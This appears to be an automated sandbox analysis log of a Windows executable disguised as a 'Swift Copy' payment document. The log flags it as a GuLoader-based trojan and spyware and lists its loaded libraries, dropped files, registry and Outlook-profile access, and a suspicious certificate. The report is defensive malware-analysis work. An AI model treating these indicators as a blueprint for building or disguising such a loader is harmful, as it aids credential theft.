Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39103360	6_2_39103360
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910B990	6_2_3910B990
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39108790	6_2_39108790
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910EB90	6_2_3910EB90
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910D5B0	6_2_3910D5B0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910A3B0	6_2_3910A3B0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_391009BF	6_2_391009BF
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910F1D0	6_2_3910F1D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_391009D0	6_2_391009D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39108DD0	6_2_39108DD0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910BFD0	6_2_3910BFD0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910DBF0	6_2_3910DBF0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910A9F0	6_2_3910A9F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_391035E8	6_2_391035E8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910C610	6_2_3910C610
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39109410	6_2_39109410
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910F810	6_2_3910F810
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39100012	6_2_39100012
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39101817	6_2_39101817
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910B030	6_2_3910B030
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910E230	6_2_3910E230
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39101828	6_2_39101828
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39109A50	6_2_39109A50
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910CC50	6_2_3910CC50
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39100040	6_2_39100040
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910CC41	6_2_3910CC41
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910E870	6_2_3910E870
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910B670	6_2_3910B670
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910A090	6_2_3910A090
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910D290	6_2_3910D290
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39100E98	6_2_39100E98
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39100E8D	6_2_39100E8D
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910BCB0	6_2_3910BCB0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39108AB0	6_2_39108AB0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910EEB0	6_2_3910EEB0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910D8D0	6_2_3910D8D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910A6D0	6_2_3910A6D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910F4F0	6_2_3910F4F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_391090F0	6_2_391090F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_3910C2F0	6_2_3910C2F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_391004FE	6_2_391004FE
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39101CE0	6_2_39101CE0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39263998	6_2_39263998
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39261DF8	6_2_39261DF8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_392632B0	6_2_392632B0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_392616D8	6_2_392616D8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39262BC8	6_2_39262BC8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39260FF0	6_2_39260FF0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_392624E0	6_2_392624E0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39263989	6_2_39263989
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39261DE8	6_2_39261DE8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_392632A0	6_2_392632A0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_392616D4	6_2_392616D4
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39260B32	6_2_39260B32
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39262BB9	6_2_39262BB9
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39260BC0	6_2_39260BC0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39264A87	6_2_39264A87
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39260C78	6_2_39260C78
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39260FE0	6_2_39260FE0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_392601E8	6_2_392601E8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_392601DB	6_2_392601DB
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_392624D0	6_2_392624D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_398F4958	6_2_398F4958
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_398F1B14	6_2_398F1B14
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_398FB450	6_2_398FB450

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Code function: String function: 00402AD0 appears 51 times

Source: Swift Copy_18.02.2025.exe

Static PE information: invalid certificate

Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3915907778.0000000035C37000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Swift Copy_18.02.2025.exe
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Swift Copy_18.02.2025.exe

Source: Swift Copy_18.02.2025.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/17@5/5

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Code function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040458C

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister

Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

File created: C:\Users\user\AppData\Local\Temp\nss284E.tmp

Jump to behavior

Source: Swift Copy_18.02.2025.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Swift Copy_18.02.2025.exe	Virustotal: Detection: 25%
Source: Swift Copy_18.02.2025.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

File read: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe"
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process created: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe"
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process created: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: stempelpudernes.lnk.0.dr	LNK file: ..\Pictures\muringerne\giggliest.pha
Source: dinosaurusserne.lnk.0.dr	LNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2822262362.0000000004E4B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3877810810.00000000035FB000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040620C

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 0_2_10002D50 push eax; ret	0_2_10002D7E
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055A9C30 push esp; retf 055Ch	6_2_055A9D55
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_398F349B push ss; retf	6_2_398F34AE

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject), 2) Invalid signature that's not trusted by provider, 3) Suspicious email domain 'Penury.Wie' which appears non-corporate and potentially fake, 4) Large time gap between compilation date (2013) and certificate creation (2025) suggests possible timestamp manipulation, 5) Organization name 'Forhaandstilsagns' appears randomly generated or suspicious, 6) While the country (FR) is not inherently suspicious, the combination with other factors suggests potential location spoofing. The certificate was created very recently (Feb 2025) which, combined with other suspicious elements, suggests this could be a newly created malicious file masquerading as legitimate software.

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

File created: C:\Users\user\AppData\Local\Temp\nsp2DFD.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
